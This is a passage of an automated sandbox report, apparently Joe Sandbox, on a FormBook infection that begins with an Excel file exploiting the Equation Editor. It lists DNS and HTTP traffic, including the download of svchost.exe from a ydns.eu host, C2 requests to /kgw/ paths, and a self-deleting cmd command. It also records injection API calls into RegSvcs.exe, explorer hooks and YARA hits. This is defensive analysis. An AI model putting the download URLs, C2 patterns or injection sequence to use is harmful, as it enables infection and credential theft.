| Nov 26, 2020 09:05:27.941457033 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
| Nov 26, 2020 09:05:27.992831945 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |

                                                                                                                                                    DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 26, 2020 09:03:41.977698088 CET | 192.168.2.22 | 8.8.8.8 | 0x5142 | Standard query (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:03:42.049945116 CET | 192.168.2.22 | 8.8.8.8 | 0x5142 | Standard query (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:04:47.181237936 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.affinitymotorsales.com | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:05:07.648457050 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.setyourhead.com | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:05:27.941457033 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.akmh.pro | A (IP address) | IN (0x0001) |

                                                                                                                                                    DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 26, 2020 09:03:42.049458981 CET | 8.8.8.8 | 192.168.2.22 | 0x5142 | No error (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | | 103.125.191.5 | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:03:42.085334063 CET | 8.8.8.8 | 192.168.2.22 | 0x5142 | No error (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | | 103.125.191.5 | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:04:47.240686893 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.affinitymotorsales.com | affinitymotorsales.com | | CNAME (Canonical name) | IN (0x0001) |
| Nov 26, 2020 09:04:47.240686893 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | affinitymotorsales.com | | 216.130.188.93 | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:05:07.687747955 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.setyourhead.com | setyourhead.com | | CNAME (Canonical name) | IN (0x0001) |
| Nov 26, 2020 09:05:07.687747955 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | setyourhead.com | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Nov 26, 2020 09:05:27.992831945 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.akmh.pro | none | none | A (IP address) | IN (0x0001) |

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
                                                                                                                                                    • www.affinitymotorsales.com
                                                                                                                                                    • www.setyourhead.com

                                                                                                                                                    HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |

Timestamp: Nov 26, 2020 09:03:42.330790997 CET; kBytes transferred: 1; Direction: OUT; Data:

GET /worksdoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
Connection: Keep-Alive

Timestamp: Nov 26, 2020 09:03:42.558485985 CET; kBytes transferred: 2; Direction: IN; Data:

HTTP/1.1 200 OK
Date: Thu, 26 Nov 2020 08:03:38 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT
ETag: "de000-5b4f69ba08c46"
Accept-Ranges: bytes
Content-Length: 909312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 216.130.188.93 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:04:47.360749960 CET | 949 | OUT | GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1
    Host: www.affinitymotorsales.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Nov 26, 2020 09:04:47.465672016 CET | 950 | IN | HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-length: 0
    Location: https://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:05:07.705564022 CET | 950 | OUT | GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1
    Host: www.setyourhead.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Nov 26, 2020 09:05:07.821191072 CET | 951 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 26 Nov 2020 08:05:07 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "5fb7c9ca-113"
    Via: 1.1 google
    Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:09:02:53
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:13
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:543304 bytes
                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:18
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:909312 bytes
                                                                                                                                                    MD5 hash:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 25%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:27
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                    File size:45216 bytes
                                                                                                                                                    MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:29
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:38
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Imagebase:0x9a0000
                                                                                                                                                    File size:101888 bytes
                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:42
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                    Imagebase:0x49d30000
                                                                                                                                                    File size:302592 bytes
                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis


                                                                                                                                                      Executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Tb6$Tb6$Tb6
                                                                                                                                                      • API String ID: 0-2153171216
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID: YFIK$YFIK
                                                                                                                                                      • API String ID: 2962429428-1440790054
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: YFIK$YFIK
                                                                                                                                                      • API String ID: 0-1440790054
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 003A0C15
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4fb4e9ab3d5468151af366d5a45d4bbe9d2c057f54725c17f4320a0d9883252a
                                                                                                                                                      • Instruction ID: 3f982a9cb519750d78dd79a1123173e98981fbeb7dd1e9599145904febc435ba
                                                                                                                                                      • Opcode Fuzzy Hash: 4fb4e9ab3d5468151af366d5a45d4bbe9d2c057f54725c17f4320a0d9883252a
                                                                                                                                                      • Instruction Fuzzy Hash: E991CE71E00628CFDB15CFAAC8447DEBBF2EF8A300F1084A9D509AB254EB745A85CF41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0443E21F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0443DC13
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0443DD7A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0443DA9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0443D8B7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 003A15E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugOutputString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1166629820-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 003A15E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugOutputString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1166629820-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 0443D73E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 003A16BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 003A16BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: !
                                                                                                                                                      • API String ID: 0-2657877971
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: +
                                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%


                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: MseG$MseG
                                                                                                                                                      • API String ID: 0-3680676839
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @2Om
                                                                                                                                                      • API String ID: 0-3646814448
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @2Om
                                                                                                                                                      • API String ID: 0-3646814448
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #
                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #
                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                      
                                                                                                                                                      				_t13 = _a4;
                                                                                                                                                      				_t28 = _a4 + 0xc48;
                                                                                                                                                      				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                      				_t6 =  &_a32; // 0x414d32
                                                                                                                                                      				_t12 =  &_a8; // 0x414d32
